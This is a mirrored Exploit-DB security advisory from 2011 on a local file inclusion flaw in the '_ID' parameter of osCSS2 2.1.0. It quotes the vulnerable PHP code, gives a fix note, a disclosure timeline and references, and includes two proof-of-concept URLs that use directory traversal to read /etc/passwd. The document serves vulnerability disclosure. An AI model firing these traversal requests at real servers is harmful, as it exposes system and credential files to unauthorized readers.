exploit-db-mirror/exploits/php/webapps/18099.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

66 lines
No EOL
1.7 KiB
Text
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

Advisory: osCSS2 "_ID" parameter Local file inclusion
Advisory ID: SSCHADV2011-034
Author: Stefan Schurtz
Affected Software: Successfully tested on osCSS2 2.1.0 (latest version)
Vendor URL: http://oscss.org/
Vendor Status: Fixed in svn branche 2.1.0 and reported in develop version 2.1.1
==========================
Vulnerability Description
==========================
osCSS2 2.1.0 "_ID" parameter is prone to a LFI vulnerability
==========================
Vulnerable code
==========================
//.htaccess
RewriteRule ^shopping_cart.php(.{0,})$ content.php?_ID=shopping_cart.php&%{QUERY_STRING}
//content.php
require($page->path_gabarit());
// includes/classes/page.php
public function pile_file_lang($path_file){
global $lang;
if(substr($path_file,0,strlen(DIR_FS_CATALOG)) !=DIR_FS_CATALOG) $path_file= DIR_FS_CATALOG.$path_file;
if(!in_array($path_file,(array)$this->PileFileLang))
include_once($path_file);
}
==================
PoC-Exploit
==================
http://<target>/catalog/shopping_cart.php?_ID=../../../../../../../../../../../etc/passwd
http://<target>/catalog/content.php?_ID=../../../../../../../../../../../etc/passwd
=========
Solution
=========
Fixed in svn branche 2.1.0 and reported in develop version 2.1.1
====================
Disclosure Timeline
====================
08-Nov-2011 - informed vendor
08-Nov-2011 – release date of this security advisory
========
Credits
========
Vulnerability found and advisory written by Stefan Schurtz.
===========
References
===========
http://oscss.org/
http://forums.oscss.org/2-security/oscss2-id-parameter-local-file-inclusion-t1999.html
http://dev.oscss.org/task/892
http://www.rul3z.de/advisories/SSCHADV2011-034.txt